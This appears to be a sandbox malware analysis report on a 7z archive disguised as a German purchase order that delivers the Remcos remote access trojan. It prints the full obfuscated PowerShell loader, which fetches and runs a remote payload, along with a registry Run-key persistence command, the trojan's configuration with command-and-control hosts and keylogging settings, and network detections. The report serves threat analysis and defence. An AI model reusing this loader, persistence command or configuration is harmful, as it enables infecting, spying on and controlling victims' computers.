| File name: | Bestellung KNAPP Smart Solutions GmbH 4500569830.7z |
| Full analysis: | https://app.any.run/tasks/86fac415-ee7e-45ec-a380-fd536aa60af3 |
| Verdict: | Malicious activity |
| Threats: | Remote access trojans (RATs) are a type of malware that enables attackers to establish complete to partial control over infected computers. Such malicious programs often have a modular design, offering a wide range of functionalities for conducting illicit activities on compromised systems. Some of the most common features of RATs include access to the users’ data, webcam, and keystrokes. This malware is often distributed through phishing emails and links. |
| Analysis date: | May 16, 2025, 09:00:29 |
| OS: | Windows 10 Professional (build: 19044, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/x-7z-compressed |
| File info: | 7-zip archive data, version 0.4 |
| MD5: | C95E96942AEAA5979F3E2291F8456029 |
| SHA1: | 72991A542EF4602F55A7AEF604ACCB3399FF1594 |
| SHA256: | 2FE872B4F693F6DF239C0F1A716482595FA5F5014715DFD6AEA426ADC1DC52F6 |
| SSDEEP: | 192:/VYlZrrxg1wPQOB5RWwm6Rgs9TR/XifiLaOj:ar3ZWwLRn9tTaw |
| .7z | | | 7-Zip compressed archive (v0.4) (57.1) |
|---|---|---|
| .7z | | | 7-Zip compressed archive (gen) (42.8) |
| FileVersion: | 7z v0.04 |
|---|---|
| ModifyDate: | 2025:05:15 08:14:58+00:00 |
| ArchivedFileName: | Bestellung KNAPP Smart Solutions GmbH 4500569830.cmd |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 960 | "C:\WINDOWS\SysWOW64\msiexec.exe" | C:\Windows\SysWOW64\msiexec.exe | powershell.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows® installer Exit code: 0 Version: 5.0.19041.3636 (WinBuild.160101.0800) Modules
Remcos(PID) Process(960) msiexec.exe C2 (1)aneesh-technomakest.duckdns.org:53567:1aneesh-technomakestbk.duckdns.org:51915 Botnetaneesh Options Connect_interval1 Install_flagFalse Install_HKCU\RunTrue Install_HKLM\RunTrue Install_HKLM\Explorer\Run1 Install_HKLM\Winlogon\Shell100000 Setup_path%LOCALAPPDATA% Copy_fileremcos.exe Startup_valueFalse Hide_fileFalse Mutex_nameRmc-IHA4YK Keylog_flag0 Keylog_path%LOCALAPPDATA% Keylog_filelogs.dat Keylog_cryptFalse Hide_keylogFalse Screenshot_flagFalse Screenshot_time5 Take_ScreenshotFalse Screenshot_path%APPDATA% Screenshot_fileScreenshots Screenshot_cryptFalse Mouse_optionFalse Delete_fileFalse Audio_record_time5 Audio_path1 Audio_dirMicRecords Connect_delay0 Copy_dirRemcos Keylog_dirremcos | |||||||||||||||
| 1056 | "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Get-Service;Get-History;$Midmandibular=[String](Get-Command A:).CommandType;$Brndselsolierne='Gnomerne';$Midmandibular+=':';(n`i -p $Midmandibular -n Vkstreguleringen -value { param ($Bravurnummers);$Pci=4;do {$Malpraxis+=$Bravurnummers[$Pci];$Pci+=5} until(!$Bravurnummers[$Pci])$Malpraxis});(n`i -p $Midmandibular -n bailie -value {param ($Skandals);.($Omosternal25) ($Skandals)});ConvertTo-Html;$Mee=Vkstreguleringen ' SanNAbereKafftPetr.Intew';$Mee+=Vkstreguleringen 'InnaEBertBKnslC,arclshebIPrioePr tNNotaT';$Koreci=Vkstreguleringen 'CoveMHzkooB ikz Fo i SpllKnaplchimaFr t/';$Efteruddanelseskurser=Vkstreguleringen 'FpspTInchl Fj s ar.1Coun2';$Staig=' al[ Seln Adlepotet ub.He.aSSe ie SmaRCatsvOveri DumcAnime glP kl oCrofiPhi nBileT AfsMMismaTempnChr ACoraG Dr e uzzR Occ]V,nk:Ungr:moosSSlvbeHypoCUm gUDesurMosqI forTSagryYerkP nderSbekOAlcatFejeOReniCU oroNaviLInte=Flok$.lage .iefExerTQuelEpr sRSlidu Trad Tatd TowAStraN Ramest clbanesDogle Ek.SAvalkDiviuoutwrSkors ScieLevnR';$Koreci+=Vkstreguleringen 'unca5 Dec.keti0.ntg Expi(SnneWFlleitrolnStandPartoSignwHyposPlat AdumNAfteTNost Ove1Unst0Paah.Sen 0Jorg;Slot ,paW ProiRivenU re6Pock4.oks;Asia Taksxhand6Over4Sk,l;Fem genir Terv Sun:Unig1srg 3Linj7Qua .takk0Fuse)Hver accoGHv eeEgencDeatkLiquoVild/Cutd2Pens0fea,1 Uns0Erec0Thio1 T l0Inel1Brac FreF sufiSteprMo.neIndsfelekoBrimxBrec/ lve1N ur3Unde7Afv,.Pist0';$Externs=Vkstreguleringen 'SoppusalpSBeb e renrS,da-HourAS.raGDu pEAfnaNBaskT';$Heksende=Vkstreguleringen 'Orlah egit ,ndtFug pForgs mod:Fo s/Snef/ StyqBull-BeshsPo.ut U,seMarkeNondlUn.u. undrBialoGulv/Pla.FSmutiOpt lVo uaUnhin etattrghrDampo ,iepEthmi Lo eTrainSpo .VrkesActinPhenp';$Udlandsturen=Vkstreguleringen 'blte>';$Omosternal25=Vkstreguleringen 'MillI HonePrsex';$Overcentralizations='Indermargenen';$Splenitive='\Ithand.Sac';bailie (Vkstreguleringen 'Paam$BalaGTilfLBr dO BenbSmaaA In l Fre:Aln sretlkCongUDispfZoriLManvEjup N Le.Dc rrElino=Fros$Afhoe OttnAloovD ni:reriaReliPKinePConiDRet.a,ndet eloAMetr+krin$ igtS DatpPhonLBosceNeo.nRetuiMiraTGravIPenoVSkane');bailie (Vkstreguleringen 'Hale$ParaGUd glLandoUngiBExcla Fe,lunco: Snih.ureA Ob AUdgaR.oolDKokaTPhotT BlaRVidt=Inco$TrugHWintE UndK RidS TakERetnNUndeD Gl EIdio.Jvnbsa onpLunkLSym.iTe.sT Sam( bib$ DjaUPresd ersl PleaCikaNR ntDEkviSThant PetuPropRSponeQu.rN Des)');bailie (Vkstreguleringen $Staig);$Heksende=$Haardttr[0];$Subgenus=(Vkstreguleringen ' il$ l vG SelLAvlsO oncbUndeaManolT ba:SikklUtviADrgtR .rdIMoviC B,bkAl,l= FornFrnue Te.wHjla- IgnOJageBt deJDeplEGummC wisT ban f uosPh tY VirS Intt A ieT,ltMP th. And$Ove MKemoe arie');bailie ($Subgenus);bailie (Vkstreguleringen 'Auto$Sem,LEk.oaUnslrUndeiS.ascForskover. hyHTa leGaula PredB.rdeDegrrMiscs raa[Disc$ce.tEPatrxFarttSicce M.nrOrgan NecsBil,]Auto=Thir$BisaKKyleo UberHokiee emcT igi');$Baghavens217=Vkstreguleringen ' MunDKam,o.rilw chnDomnlTrano Ti aLepidAffiFNys,iPtyalSamfe';$Idolatrising=Vkstreguleringen 'Outp$CyprLsubsa Pr rUdgriRumpcTh lkJord.s ml$ comBKnowa Ng g El hVattaClotvIm ae R,mnSk ls Ens2 red1 Unl7ma r.redeIAsswnTurcv HaroKun.kPrvee The(,ard$Dok HInd eSki k SubsNonieLuf nBroadDenaeRyl , Unc$I dvDInteaHydrnAdv.sHa dkV.lgsbrodpOncorDomnoSa dgIncieCorbtBobc)';$Dansksproget=$Skuflende;bailie (Vkstreguleringen '.oll$Teg g,ynkLProvOTrunbNonsaS,erlGlaz:Gendh GloA ,isRTi sOMuskUkordNTotu= Va (Yt et ProeBiffSBo.tTTheo-FedepKul aItysTSysthNonp Sma$KardD efaFejlNnotosRestKEpitsgashPbrugRkomfO,ejegPhyteDvortrapp)');while (!$Haroun) {bailie (Vkstreguleringen ' un$ cleg Menl KiroAdeqbG.neaBndll oly: lasRTe.ne eattSpa.aAnlirNontdBef es str kneTykn= myc$T,knRUtopuExamd emii Empm ComeMe.on SoftPsykefulnr') ;bailie $Idolatrising;bailie (Vkstreguleringen 'Mill[ ReqtHaemhdandR,ohuEU teAEur dInteISmedNNonsGU ab..ipptPla,HBostRBelsEK neAAffedElec]Pari:Lic.:,rresGr,slBrodeSom eCan.pJaun(Smit4 Ry,0Unpa0Fasc0Mose)');bailie (Vkstreguleringen 'Mumf$FylkG KdeL cawO WarBTrykaAagel Lou:Radoh piaMderROp.aoJuleuG.ntNUniq=Undl(OxypT Qu eMo.mSAvistH.er-,egep Re,aTelat A nhM ri Long$Re eD,ebeaIkldnC.oaSSmkkKUnmosMellp Decr Ch.o SalGOncaePromTCam.)') ;bailie (Vkstreguleringen 'Apod$OverGKharlOphuOFlyvB,ataaNonaLAsyl:LilaPJ rdRKhmeoIndeGAtomR UdfaGlosmFornMRid hChouU.emoKSp tO Pa mGu emCache ch,LFokuSBundE ugv=Geo,$LandgnavslBundODistbQmglABe zLTrog:SgesSGlu tSektRChora S.kmSit nLej.iDermN ahuGina eModerO erSZoop+kl.t+Was %Re,u$pl sHHelbaHat,AUds.RMiscDEstiT MarTSjakrD rb.Udj cPr,sosat UAlabN,irkT') ;$Heksende=$Haardttr[$Programmhukommelse]}$Pcimprgneret=373138;$gerenuks=30684;bailie (Vkstreguleringen 'Lev $ Ta.gSadelUd,koFornb Ps A NvnlThal: stot,vidEApolNIncroInt r Po SFemaADdedXSk.loKamlf Zipo Jern StriReg.sMoolTLuthE.arlr MinS Fe Foel=M.js DenigIndkECyraTTula-SkgpCGedeO,rveNFl,mTV nseCautN irit Sla Nid $FygnD drAMobbnTeleSBrodkDozeSJeasP OverCabeo TheGfrugespint');bailie (Vkstreguleringen ' Vis$ ErhgudvilMidsoCounbDeleaPrivlMold:begukPolarMinieOverdForhsSur.r GooeKbartDrag Unfo= Slu Mone[Ba iSSugeyProcs Hort ThieMedim ir.KnkfCSt kos ilnDelavMooreCar rWadstDans] eig:Kvr :MycoFM terF rsoTrdnmU.inBBedraMorfs Hule Re,6For 4 KaiSK sstsnufrB mbiWicknSlusgKata( Eff$ GarT Me.eBritn FjeoUns.rEleksInscaSm gxFe doAlowfAerooT,ren DiaiPerfs .thtSli eOdelrM tlsS.ns)');bailie (Vkstreguleringen ' Na $RaveGUngiL inO ienBExsuAPabsLIle :HumaNHoreoAfsvnUdmnaOstrRB naRIngeOSexdGmeaca NodND,nnC UnlYOo,o Kons=flos Se,g[Ve tS yrtYHo hSFljtTRetsePithMGold.tanktWeste,halx .rktSynd.M riEAb,onGrunCNedsOAltedSr,ei,iagNBheng .la]Seco: Mor:WeedA,abuSNontcOverI S,vILugn.tidsg IdeEDagsTT.lfsJ.rdtWaterKo,vIO gaN B,rGS ip(Gstg$UnprkCommRAkupeFlocd SprS PupR VerEUddeTflua)');bailie (Vkstreguleringen 'Stra$PolagHyg L Deroa etBManbATeksL cr:PrsiBO reR NonEO thV SkeIGeo,RFreto VansGrnstOscuRReliiSideNUstyERehasPsyk=coll$ Ou.nCrecOFrstnLyska TofRSaltROp aOKonkgCardASabrNPrisCBe aYE hj.J.rlSF rbuSem BKat,sPodotTourRJab.iTi bnPhengMoto(S el$ unipC,hncCaraIDe tMEksipAcroRArbogNrbiNTalkeMa aRRepae VejtMono, Re $DatoGBortEMis.RarriESlotNEffauTilsKKaleSMugw)');bailie $Brevirostrines;" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1184 | "C:\WINDOWS\System32\NOTEPAD.EXE" C:\Users\admin\Desktop\Bestellung KNAPP Smart Solutions GmbH 4500569830\Bestellung KNAPP Smart Solutions GmbH 4500569830.cmd | C:\Windows\System32\notepad.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Notepad Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1676 | "C:\WINDOWS\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\obkxpq.vbs" | C:\Windows\SysWOW64\wscript.exe | — | msiexec.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.812.10240.16384 Modules
| |||||||||||||||
| 2100 | REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Startup key" /t REG_EXPAND_SZ /d "%exhorted% -windowstyle 2 $Anetiological=(g`p 'HKCU:\Software\prisopgavens\').'Snuptags';%exhorted% ($Anetiological)" | C:\Windows\SysWOW64\reg.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Registry Console Tool Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2152 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\Desktop\Bestellung KNAPP Smart Solutions GmbH 4500569830.7z" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe | |||||||||||
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Exit code: 0 Version: 5.91.0 Modules
| |||||||||||||||
| 2196 | C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s Dnscache | C:\Windows\System32\svchost.exe | services.exe | ||||||||||||
User: NETWORK SERVICE Company: Microsoft Corporation Integrity Level: SYSTEM Description: Host Process for Windows Services Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2316 | C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\admin\AppData\Local\Temp\abolcp" | C:\Windows\SysWOW64\svchost.exe | — | msiexec.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Host Process for Windows Services Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2384 | "C:\Program Files\WinRAR\WinRAR.exe" x -iext -ow -ver -- "C:\Users\admin\Desktop\Bestellung KNAPP Smart Solutions GmbH 4500569830.7z" "C:\Users\admin\Desktop\Bestellung KNAPP Smart Solutions GmbH 4500569830\" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe | |||||||||||
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Exit code: 0 Version: 5.91.0 Modules
| |||||||||||||||
| 3020 | C:\WINDOWS\System32\rundll32.exe C:\WINDOWS\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding | C:\Windows\System32\rundll32.exe | — | svchost.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows host process (Rundll32) Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| (PID) Process: | (2152) WinRAR.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory |
| Operation: | write | Name: | 3 |
Value: C:\Users\admin\Desktop\preferences.zip | |||
| (PID) Process: | (2152) WinRAR.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory |
| Operation: | write | Name: | 2 |
Value: C:\Users\admin\Desktop\chromium_ext.zip | |||
| (PID) Process: | (2152) WinRAR.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory |
| Operation: | write | Name: | 1 |
Value: C:\Users\admin\Desktop\omni_23_10_2024_.zip | |||
| (PID) Process: | (2152) WinRAR.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory |
| Operation: | write | Name: | 0 |
Value: C:\Users\admin\Desktop\Bestellung KNAPP Smart Solutions GmbH 4500569830.7z | |||
| (PID) Process: | (2152) WinRAR.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | name |
Value: 120 | |||
| (PID) Process: | (2152) WinRAR.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | size |
Value: 80 | |||
| (PID) Process: | (2152) WinRAR.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | type |
Value: 120 | |||
| (PID) Process: | (2152) WinRAR.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | mtime |
Value: 100 | |||
| (PID) Process: | (2152) WinRAR.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\WinRAR\Interface\MainWin |
| Operation: | write | Name: | Placement |
Value: 2C0000000000000001000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF3D0000002D000000FD03000016020000 | |||
| (PID) Process: | (2152) WinRAR.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\ArcColumnWidths |
| Operation: | write | Name: | name |
Value: 256 | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 5260 | svchost.exe | C:\Users\admin\AppData\Local\Temp\bhv6191.tmp | — | |
MD5:— | SHA256:— | |||
| 5324 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary | |
MD5:815937A797245A2CC6F3ACAF587CA7EF | SHA256:6F5A18ED8A4EEDAB73F59B1EA5DEEBDC47E8D1B9A00A40C17B76835F38E659C3 | |||
| 2384 | WinRAR.exe | C:\Users\admin\Desktop\Bestellung KNAPP Smart Solutions GmbH 4500569830\Bestellung KNAPP Smart Solutions GmbH 4500569830.cmd | text | |
MD5:25608ED3093E013063007BCC36C5AFDC | SHA256:1F7886C87D4F10651E5FFE9C068AA037D859B3F8C21A112EAF738F6BDDE8FED7 | |||
| 1056 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | binary | |
MD5:8E7D26D71A1CAF822C338431F0651251 | SHA256:495E7C4588626236C39124CCE568968E874BEDA950319BA391665B43DE111084 | |||
| 5324 | powershell.exe | C:\Users\admin\AppData\Roaming\Ithand.Sac | text | |
MD5:16A257ED9B1E5A15B16C590C865AC559 | SHA256:799B9A30EFE28B0719B80DAED853135CF634CFCAD064EF8CF2B23DECE8D2BC0B | |||
| 960 | msiexec.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C783526C14615EE88537C752E6B0C4DC | binary | |
MD5:ED91646FB523BEE285DED7B34D48ECA9 | SHA256:96B9B0172784761B65E53A11F4D9F8B9A811F852EC2E83E3538AE561887A8E3C | |||
| 1056 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_st2sacdq.3xw.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 960 | msiexec.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 | binary | |
MD5:E192462F281446B5D1500D474FBACC4B | SHA256:F1BA9F1B63C447682EBF9DE956D0DA2A027B1B779ABEF9522D347D3479139A60 | |||
| 960 | msiexec.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 | binary | |
MD5:2C1DA885E767874E4CBDFB169C657D1D | SHA256:427C8201E21A8A8954A3C233D1C01DD2BF8AD56E83C92DBECB2437948106AC72 | |||
| 960 | msiexec.exe | C:\Users\admin\AppData\Local\Temp\TH6153.tmp | executable | |
MD5:D1CA7BE039D728EA77ABFC00587572F4 | SHA256:1EE47FD5EC3B23B6471CDE2B715007513BD72287E6D4DD1204B3BF8988329092 | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
— | — | GET | 200 | 23.216.77.21:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
— | — | GET | 200 | 2.23.246.101:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
6544 | svchost.exe | GET | 200 | 2.17.190.73:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | — | — | whitelisted |
6388 | SIHClient.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | — | — | whitelisted |
6388 | SIHClient.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | — | — | whitelisted |
960 | msiexec.exe | GET | 200 | 23.209.209.135:80 | http://x1.c.lencr.org/ | unknown | — | — | whitelisted |
960 | msiexec.exe | GET | 200 | 65.9.66.40:80 | http://r11.c.lencr.org/21.crl | unknown | — | — | whitelisted |
960 | msiexec.exe | GET | 200 | 178.237.33.50:80 | http://geoplugin.net/json.gp | unknown | — | — | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
— | — | 20.73.194.208:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
— | — | 23.216.77.21:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted |
— | — | 2.23.246.101:80 | www.microsoft.com | Ooredoo Q.S.C. | QA | whitelisted |
2104 | svchost.exe | 20.73.194.208:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
3216 | svchost.exe | 172.211.123.249:443 | client.wns.windows.com | MICROSOFT-CORP-MSN-AS-BLOCK | FR | whitelisted |
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
6544 | svchost.exe | 20.190.160.3:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
6544 | svchost.exe | 2.17.190.73:80 | ocsp.digicert.com | AKAMAI-AS | DE | whitelisted |
2112 | svchost.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
Domain | IP | Reputation |
|---|---|---|
crl.microsoft.com |
| whitelisted |
google.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
client.wns.windows.com |
| whitelisted |
login.live.com |
| whitelisted |
ocsp.digicert.com |
| whitelisted |
settings-win.data.microsoft.com |
| whitelisted |
slscr.update.microsoft.com |
| whitelisted |
fe3cr.delivery.mp.microsoft.com |
| whitelisted |
q-steel.ro |
| unknown |
PID | Process | Class | Message |
|---|---|---|---|
2196 | svchost.exe | Potentially Bad Traffic | ET DYN_DNS DYNAMIC_DNS Query to a *.duckdns .org Domain |
2196 | svchost.exe | Misc activity | ET DYN_DNS DYNAMIC_DNS Query to *.duckdns. Domain |
2196 | svchost.exe | Potentially Bad Traffic | ET DYN_DNS DYNAMIC_DNS Query to a *.duckdns .org Domain |
2196 | svchost.exe | Misc activity | ET DYN_DNS DYNAMIC_DNS Query to *.duckdns. Domain |
2196 | svchost.exe | Misc activity | ET DYN_DNS DYNAMIC_DNS Query to *.duckdns. Domain |
2196 | svchost.exe | Potentially Bad Traffic | ET DYN_DNS DYNAMIC_DNS Query to a *.duckdns .org Domain |
2196 | svchost.exe | Misc activity | ET DYN_DNS DYNAMIC_DNS Query to *.duckdns. Domain |
2196 | svchost.exe | Potentially Bad Traffic | ET DYN_DNS DYNAMIC_DNS Query to a *.duckdns .org Domain |
2196 | svchost.exe | Potentially Bad Traffic | ET DYN_DNS DYNAMIC_DNS Query to a *.duckdns .org Domain |
2196 | svchost.exe | Misc activity | ET DYN_DNS DYNAMIC_DNS Query to *.duckdns. Domain |